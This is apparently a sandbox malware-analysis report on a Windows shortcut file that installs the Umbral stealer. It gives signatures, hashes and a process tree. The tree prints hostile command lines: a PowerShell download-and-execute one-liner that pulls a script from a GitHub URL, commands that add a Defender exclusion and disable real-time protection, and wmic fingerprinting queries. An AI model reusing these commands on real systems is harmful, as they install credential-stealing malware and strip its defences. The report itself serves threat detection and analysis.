Overview

overview

10

Static

static

1

1231321312.lnk

windows10-2004-x64

10

Resubmissions

23/03/2025, 14:55

250323-san3jsyjv6 10

23/03/2025, 14:54

250323-r9t76sxr17 10

23/03/2025, 14:51

250323-r74zlaxrv8 10

Analysis

  • max time kernel
    39s
  • max time network
    41s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/03/2025, 14:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1231321312.lnk

  • Size

    2KB

  • MD5

    a83ed03220cbc79bcbcaae9a57d0b95a

  • SHA1

    062d88505a421b491c8614ccff1d8fdd34453e18

  • SHA256

    c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033

  • SHA512

    97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349

Score
10/10
umbralexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Umbral family
    umbral
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5068
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4800
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4524
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1884
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4536
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
            PID:4932
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:3756
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            4⤵
            • Detects videocard installed
            PID:3452

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      6de151c2a03149e5969163e29f43e022

      SHA1

      96b3cd620fb2b3b62686b14d2e8ddb0c865759ef

      SHA256

      b570c29f7691fc5e4bca51caf9ed72175c6d5df058c5800091a34de6c512b2e4

      SHA512

      0dbd4f4595570c3edc4c88c21f4b0cfe54cd49f1ce1d8379e1452573ced149326a5654ec333efbc530b8414f9feef048d6fec2642f2417fa6679f0303a043906

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      f994815edea79688903f374b373848cc

      SHA1

      122c649520fa4e5f9ee602ead7748cab2448deb1

      SHA256

      63c62fe05e690671d433399df8565a0a99d6a9d9708fc8033b8d196b672ccda4

      SHA512

      b8e9e749a88a3b8f728fddcaf6353345e8e53b2a1fc8b06f182745907c53c106bf3a530846031619d9a6c2b94a7d0468d05389e84087f447e3f377154a9e12d3

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      2af06a6b36db9473e4a7d9c7ab72b70b

      SHA1

      8ef34b9b961e51bdd1b8d7d9db2ec1b0a4764645

      SHA256

      18a2aa7e245c6732f95fb7749b2b4d29007f2c56a9c5bfbc5e3c127bdfe5f158

      SHA512

      3495567a5d5af94ae27be51313d9e2630c52017d808042fe0d56baa34fa1d246eb15c253d14c77c77a1d8f2f1c81680e623044ae95415b095696e7fa141ac7cf

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      Filesize

      227KB

      MD5

      68b35208a6ccc5cf6cfa41f86712e7ab

      SHA1

      34c735c3cc8fd7f9d225cd7323e5632aa772f465

      SHA256

      4a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279

      SHA512

      f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eplakfyc.53i.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2612-14-0x00007FFBB4E80000-0x00007FFBB5941000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2612-16-0x00007FFBB4E80000-0x00007FFBB5941000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2612-31-0x00007FFBB4E80000-0x00007FFBB5941000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2612-15-0x00007FFBB4E80000-0x00007FFBB5941000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2612-2-0x00007FFBB4E83000-0x00007FFBB4E85000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2612-13-0x00007FFBB4E80000-0x00007FFBB5941000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2612-12-0x000002CC40480000-0x000002CC404A2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5068-30-0x000001A6D1690000-0x000001A6D16D0000-memory.dmp

      Filesize

      256KB

      Download

    • memory/5068-55-0x000001A6EBDC0000-0x000001A6EBE10000-memory.dmp

      Filesize

      320KB

      Download

    • memory/5068-56-0x000001A6EBE90000-0x000001A6EBF06000-memory.dmp

      Filesize

      472KB

      Download

    • memory/5068-57-0x000001A6EBD20000-0x000001A6EBD3E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5068-64-0x000001A6EBD50000-0x000001A6EBD5A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/5068-65-0x000001A6EBD90000-0x000001A6EBDA2000-memory.dmp

      Filesize

      72KB

      Download